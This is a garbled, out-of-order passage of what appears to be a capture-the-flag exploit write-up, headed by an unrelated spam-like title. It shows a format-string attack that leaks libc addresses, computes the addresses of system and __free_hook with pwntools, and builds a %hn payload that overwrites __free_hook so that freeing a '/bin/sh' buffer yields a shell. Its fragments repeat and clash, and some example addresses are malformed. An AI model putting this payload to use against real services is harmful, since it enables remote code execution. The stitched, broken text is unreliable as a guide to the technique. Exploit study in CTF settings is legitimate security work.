Sone-127 2021 <2025>

> echo %p %p %p %p %p 0x7ffd2a8e2c30 0x0 0x7f5c1a2b2e30 0x0 0x7ffd2a8e2c30 That means the printf in the source is something like:

# 1️⃣ Leak libc libc_base = leak_libc(io) SONE-127 2021

def pack_addr(addr): return p64(addr)

# 3️⃣ Get a shell get_shell(io)

# Build the format string payload = b'A'*8 payload += f"%lowc%8$hn".encode() payload += f"%diffc%9$hn".encode() payload += b'B'*8 payload += p64(free_hook) # 8th argument payload += p64(free_hook + 2) # 9th argument &gt; echo %p %p %p %p %p 0x7ffd2a8e2c30

| Symbol | Offset (hex) | Address (example) | |-----------------|--------------|-------------------| | system | 0x4f550 | 0x7f5c190f550 | | __free_hook | 0x3ed8e8 | 0x7f5c193ed8e8 | | /bin/sh string| 0x1b75aa | 0x7f5c191b75aa | Use pwntools : libc = ELF('libc-2.31.so') system_addr = libc.symbols['system'] + libc_base free_hook = libc.symbols['__free_hook'] + libc_base binsh = next(libc.search(b'/bin/sh')) + libc_base 5.3 Write system into __free_hook The binary uses malloc / free internally for the upload / download commands. By uploading a large payload we can control a heap chunk and then use the format‑string write to place the system address at __free_hook . When we later request download sh

> upload sh.txt [uploading 8 bytes] /bin/sh The service stores the content in a heap chunk. When we later request download sh.txt , the binary will free the buffer after sending the content. Because __free_hook now points to system , free(buf) becomes system(buf) . Since buf points to the string "/bin/sh" , we get a shell.